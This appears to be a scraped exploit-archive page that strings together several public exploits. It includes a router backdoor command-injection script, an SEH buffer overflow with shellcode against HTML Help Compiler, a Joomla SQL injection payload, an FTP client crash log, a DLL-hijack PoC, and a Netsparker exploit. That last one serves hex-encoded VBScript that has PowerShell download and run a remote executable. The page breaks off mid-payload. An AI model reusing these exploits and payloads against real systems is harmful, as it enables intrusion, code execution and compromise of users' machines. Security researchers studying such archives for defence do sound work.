s.connect((sys.argv[1], 5555)) s.send("oki,xasf") s.close() except: print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0]) exit(2) return if check_activate_backdoor(): print("\x1b[032mThis device appears to be vulnerable\nbackdoor activated\x1b[0m") try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send("POST /boafrm/formSysCmd HTTP/1.1\r\n\r\nsysCmd=%s&apply=Apply&msg=\r\n\r\n" % commandstr) print("\x1b[032mCommands sent\x1b[0m") print("\x1b[032mResponse: \n%s\x1b[0m" % s.recv(512)) s.close() except: print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" % sys.exc_info()[0]) exit(2) close_backdoor() exit(0) else: print("\x1b[032mThis device isn't vulnerable lol\x1b[0m") exit(1)
HireHackking

Microsoft HTML Help Compiler 4.74.8702.0 - Local Overflow (SEH)

HACKER · %s · %s

#!/usr/bin/env python # # Exploit Title: Microsoft HTML Help Compiler SEH Based Overflow # Date: 2015-08-13 # Exploit Author: St0rn <st0rn[at]anbu-pentest[dot]com> # Twitter: st0rnpentest # # Vendor Homepage: www.microsoft.com # Software Link: http://www.microsoft.com/downloads/details.aspx?FamilyID=00535334-c8a6-452f-9aa0-d597d16580cc&displaylang=en # Version: 4.74.8702.0 # Tested on: Windows 7 # from subprocess import Popen from struct import pack # 112 bytes All Windows Null-Free CreateProcessA Calc Shellcode # We have only 189 bytes after SE Handler # https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html shellcode="" shellcode+="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" shellcode+="\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" shellcode+="\x77\x20\x8b\x3f\x80\x7e\x0c\x33" shellcode+="\x75\xf2\x89\xc7\x03\x78\x3c\x8b" shellcode+="\x57\x78\x01\xc2\x8b\x7a\x20\x01" shellcode+="\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" shellcode+="\x45\x81\x3e\x43\x72\x65\x61\x75" shellcode+="\xf2\x81\x7e\x08\x6f\x63\x65\x73" shellcode+="\x75\xe9\x8b\x7a\x24\x01\xc7\x66" shellcode+="\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" shellcode+="\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" shellcode+="\xb1\xff\x53\xe2\xfd\x68\x63\x61" shellcode+="\x6c\x63\x89\xe2\x52\x52\x53\x53" shellcode+="\x53\x53\x53\x53\x52\x53\xff\xd7" junk='\x61'*284 nseh='\xeb\x1e\x90\x90' # jump 30 bytes nop='\x90'*40 # nop seh=pack("<I", 0x45312d14) # pop ecx # pop ecx # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [HHA.dll] payload=junk+nseh+seh+nop+shellcode padding='\x61'*(10000-len(payload)) exploit=payload+padding try: Popen(["C:\Program Files\HTML Help Workshop\hhc.exe",exploit],shell=False) print "Hack'n'Roll" except: print "Cannot run hhc.exe"
HireHackking

Joomla! Component com_informations - SQL Injection

HACKER · %s · %s

# Exploit Title: Joomla com_informations component SQL Injection vulnerability # Date: 13-08-2015 # Software Link: N/A # Exploit Author: Omar AbuHassan # Contact: https://www.linkedin.com/pub/omar-abu-hassan/bb/600/960 # CVE: N/A # Category: webapps # Version: All # Tested on: Kali linux (x64) / Windows 8.1 pro (x64) 1. Description Normal user can inject sql query in the url which lead to read data from the database. 2. Proof of Concept http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI) Injected column is # 3 http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23 ** No solution yet from vendor ** ####################### # Greets to Palestine # #######################
HireHackking

NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)

HACKER · %s · %s

### #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Ubuntu 14.04 NetKit FTP Client Crash/DoS POC #[+] Date: 15-08-2015 #[+] Type: Local Exploits #[+] Tested on: Ubuntu 14.04 Works with other distros (11.04:https://www.exploit-db.com/exploits/17806/) #[+] Twitter: @TCYB3R ## cyb3rus@ubuntu:~$ gdp ftp No command 'gdp' found, but there are 17 similar ones gdp: command not found cyb3rus@ubuntu:~$ gdb ftp GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from ftp...(no debugging symbols found)...done. (gdb) run ftp-server.demo.solarwinds.com Starting program: /usr/bin/ftp ftp-server.demo.solarwinds.com Connected to ftp-server.demo.solarwinds.com. 220 Serv-U FTP Server v15.1 ready... Name (ftp-server.demo.solarwinds.com:cyb3rus): demo 331 User name okay, need password. Password: 230 User logged in, proceed. Remote system type is UNIX. Using binary mode to transfer files. ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA *** buffer overflow detected ***: /usr/bin/ftp terminated ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x7338f)[0x7ffff784238f] /lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff78d9c9c] /lib/x86_64-linux-gnu/libc.so.6(+0x109b60)[0x7ffff78d8b60] /lib/x86_64-linux-gnu/libc.so.6(__strncat_chk+0x13c)[0x7ffff78d7f9c] /usr/bin/ftp[0x407a08] /usr/bin/ftp[0x402cd0] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf5)[0x7ffff77f0ec5] /usr/bin/ftp[0x402f49] ======= Memory map: ======== 00400000-00413000 r-xp 00000000 08:01 656161 /usr/bin/netkit-ftp 00612000-00613000 r--p 00012000 08:01 656161 /usr/bin/netkit-ftp 00613000-00615000 rw-p 00013000 08:01 656161 /usr/bin/netkit-ftp 00615000-00665000 rw-p 00000000 00:00 0 [heap] 7ffff5e4e000-7ffff5e64000 r-xp 00000000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff5e64000-7ffff6063000 ---p 00016000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff6063000-7ffff6064000 rw-p 00015000 08:01 5771565 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff6064000-7ffff6746000 r--p 00000000 08:01 662545 /usr/lib/locale/locale-archive 7ffff6746000-7ffff675d000 r-xp 00000000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so 7ffff675d000-7ffff695d000 ---p 00017000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so 7ffff695d000-7ffff695e000 r--p 00017000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so 7ffff695e000-7ffff695f000 rw-p 00018000 08:01 5771664 /lib/x86_64-linux-gnu/libresolv-2.19.so 7ffff695f000-7ffff6961000 rw-p 00000000 00:00 0 7ffff6961000-7ffff6966000 r-xp 00000000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so 7ffff6966000-7ffff6b65000 ---p 00005000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so 7ffff6b65000-7ffff6b66000 r--p 00004000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so 7ffff6b66000-7ffff6b67000 rw-p 00005000 08:01 5771611 /lib/x86_64-linux-gnu/libnss_dns-2.19.so 7ffff6b67000-7ffff6b69000 r-xp 00000000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2 7ffff6b69000-7ffff6d68000 ---p 00002000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2 7ffff6d68000-7ffff6d69000 r--p 00001000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2 7ffff6d69000-7ffff6d6a000 rw-p 00002000 08:01 5771619 /lib/x86_64-linux-gnu/libnss_mdns4_minimal.so.2 7ffff6d6a000-7ffff6d75000 r-xp 00000000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 7ffff6d75000-7ffff6f74000 ---p 0000b000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 7ffff6f74000-7ffff6f75000 r--p 0000a000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 7ffff6f75000-7ffff6f76000 rw-p 0000b000 08:01 5771623 /lib/x86_64-linux-gnu/libnss_nis-2.19.so 7ffff6f76000-7ffff6f8d000 r-xp 00000000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so 7ffff6f8d000-7ffff718c000 ---p 00017000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so 7ffff718c000-7ffff718d000 r--p 00016000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so 7ffff718d000-7ffff718e000 rw-p 00017000 08:01 5771607 /lib/x86_64-linux-gnu/libnsl-2.19.so 7ffff718e000-7ffff7190000 rw-p 00000000 00:00 0 7ffff7190000-7ffff7199000 r-xp 00000000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 7ffff7199000-7ffff7398000 ---p 00009000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 7ffff7398000-7ffff7399000 r--p 00008000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 7ffff7399000-7ffff739a000 rw-p 00009000 08:01 5771609 /lib/x86_64-linux-gnu/libnss_compat-2.19.so 7ffff739a000-7ffff73a5000 r-xp 00000000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so 7ffff73a5000-7ffff75a4000 ---p 0000b000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so 7ffff75a4000-7ffff75a5000 r--p 0000a000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so 7ffff75a5000-7ffff75a6000 rw-p 0000b000 08:01 5771613 /lib/x86_64-linux-gnu/libnss_files-2.19.so 7ffff75a6000-7ffff75cb000 r-xp 00000000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7ffff75cb000-7ffff77ca000 ---p 00025000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7ffff77ca000-7ffff77ce000 r--p 00024000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7ffff77ce000-7ffff77cf000 rw-p 00028000 08:01 5771684 /lib/x86_64-linux-gnu/libtinfo.so.5.9 7ffff77cf000-7ffff798a000 r-xp 00000000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so 7ffff798a000-7ffff7b89000 ---p 001bb000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so 7ffff7b89000-7ffff7b8d000 r--p 001ba000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so 7ffff7b8d000-7ffff7b8f000 rw-p 001be000 08:01 5771538 /lib/x86_64-linux-gnu/libc-2.19.so 7ffff7b8f000-7ffff7b94000 rw-p 00000000 00:00 0 7ffff7b94000-7ffff7bd1000 r-xp 00000000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3 7ffff7bd1000-7ffff7dd1000 ---p 0003d000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3 7ffff7dd1000-7ffff7dd3000 r--p 0003d000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3 7ffff7dd3000-7ffff7dd9000 rw-p 0003f000 08:01 5771663 /lib/x86_64-linux-gnu/libreadline.so.6.3 7ffff7dd9000-7ffff7dda000 rw-p 00000000 00:00 0 7ffff7dda000-7ffff7dfd000 r-xp 00000000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so 7ffff7fdf000-7ffff7fe2000 rw-p 00000000 00:00 0 7ffff7fea000-7ffff7feb000 rw-p 00000000 00:00 0 7ffff7feb000-7ffff7ff2000 r--s 00000000 08:01 920152 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache 7ffff7ff2000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00022000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so 7ffff7ffd000-7ffff7ffe000 rw-p 00023000 08:01 5771514 /lib/x86_64-linux-gnu/ld-2.19.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7805cc9 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56 56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
HireHackking
// source: https://www.securityfocus.com/bid/55421/info ThinPrint is prone to a vulnerability that lets attackers execute arbitrary code. Exploiting this issue allows local attackers to execute arbitrary code with the privileges of the user running the affected application. #include <windows.h> int hijack_poc () { WinExec ( "calc.exe" , SW_NORMAL ); return 0 ; } BOOL WINAPI DllMain ( HINSTANCE hinstDLL , DWORD dwReason , LPVOID lpvReserved ) { hijack_poc () ; return 0 ; }
HireHackking

Netsparker 2.3.x - Remote Code Execution

HACKER · %s · %s

#!/usr/bin/python # Title : Netsparker 2.3.X - Remote Code Execution # Tested on Netsparker 2.3.x / Win 7 # # # Author : Hesam Bazvand # E-Mail : black.king066@gmail.com # FaceBook : https://www.facebook.com/hesam.king73 # Twitter : https://twitter.com/hesam_king73 # # # Exploit MS14-064 CVE2014-6332 # # # 1 . run python code : python netsparker.py # 2 . run netsparker # 3 . "Start a New Scan" # 4 . Enter your exploit link http://ipaddress:80/ in Target URL # 5 . goto to "Authentication" Menu # 6 . select "Form Authentication" # 7 . Click "Next >" # 10 . Your Link Download/Execute on your target ;) # 11 . Finished ;) import socket HOST, PORT = '', 80 listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listen_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) listen_socket.bind((HOST, PORT)) listen_socket.listen(1) print 'Serving HTTP on port %s ...' % PORT while True: client_connection, client_address = listen_socket.accept() request = client_connection.recv(1024) print request hesam=("\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76" "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65" "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68" "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20" "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63" "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75" "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20" "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62" "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22" "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65" "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65" "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61" "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c" "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d" "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53" "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b" "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70" "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e" "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61" "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73" "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55" "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d" "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d" "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61" "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78" "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20" "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a" "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28" "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a" "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a" "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65" "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22" "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20" "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69" "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22" "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e" "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20" "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65" "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f" "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65" "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a" "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61" "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61" "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68" "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30" "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72" "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61" "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68" "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28" "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f" "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75" "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69" "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e" "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29" "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d" "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69" "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f" "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a" "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33" "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e" "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66" "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45" "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20" "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72" "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76" "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43" "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20" "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74" "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74" "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e" "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45" "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69" "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20" "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32" "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a" "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30" "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d" "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61" "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34" "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61" "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50" "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75" "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20" "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e" "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20" 